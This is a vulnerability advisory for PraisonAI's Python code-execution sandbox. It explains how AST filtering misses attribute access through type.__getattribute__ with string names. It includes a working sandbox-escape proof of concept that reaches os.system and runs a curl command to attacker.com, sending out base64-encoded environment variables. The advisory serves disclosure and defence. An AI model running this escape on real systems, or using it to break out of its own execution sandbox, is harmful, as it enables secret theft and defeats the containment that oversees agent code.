PT-2026-59535 · Pypi · Praisonai

Published

2026-07-13

·

Updated

2026-07-13

CVSS v3.1

8.6

High

VectorAV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
PraisonAI's AST-based Python sandbox can be bypassed using type. getattribute trampoline, allowing arbitrary code execution when running untrusted agent code.

Description

The execute code direct function in praisonaiagents/tools/python tools.py uses AST filtering to block dangerous Python attributes like subclasses, globals, and bases. However, the filter only checks ast.Attribute nodes, allowing bypass via:
The sandbox relies on AST-based filtering of attribute access but fails to account for dynamic attribute resolution via built-in methods such as type. getattribute , resulting in incomplete enforcement of security restrictions.
python
type. getattribute (obj, ' subclasses ') # Bypasses filter
The string ' subclasses ' is an ast.Constant, not an ast.Attribute, so it is never checked against the blocked list.

Proof of Concept

python
# This code bypasses the sandbox and achieves RCE
t = type
int cls = t(1)

# Bypass blocked  bases  via type. getattribute 
bases = t. getattribute (int cls, ' bases ')
obj cls = bases[0]

# Bypass blocked  subclasses 
subclasses fn = t. getattribute (obj cls, ' subclasses ')
all subclasses = subclasses fn()

# Find wrap close class
for c in all subclasses:
  if t. getattribute (c, ' name ') == ' wrap close':
    # Get  init . globals  via bypass
    init = t. getattribute (c, ' init ')
    glb = type(init). getattribute (init, ' globals ')
    
    # Get system function and execute
    system = glb['system']
    system('curl https://attacker.com/steal --data "$(env | base64)"')

Impact

This vulnerability allows attackers to escape the intended Python sandbox and execute arbitrary code with the privileges of the host process.
An attacker can:
  • Access sensitive data such as environment variables, API keys, and local files
  • Execute arbitrary system commands
  • Modify or delete files on the system
In environments that execute untrusted code (e.g., multi-tenant agent platforms, CI/CD pipelines, or shared systems), this can lead to full system compromise, data exfiltration, and potential lateral movement within the infrastructure.

Affected Code

python
# praisonaiagents/tools/python tools.py (approximate)
def execute code direct(code, ...):
  tree = ast.parse(code)
  
  for node in ast.walk(tree):
    # Only checks ast.Attribute nodes
    if isinstance(node, ast.Attribute) and node.attr in blocked attrs:
      raise SecurityError(...)
  
  # Bypass: string arguments are not checked
  exec(compiled, safe globals)
Reporter: Lakshmikanthan K (letchupkt)

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

Related Identifiers

PYSEC-2026-2898

Affected Products

Praisonai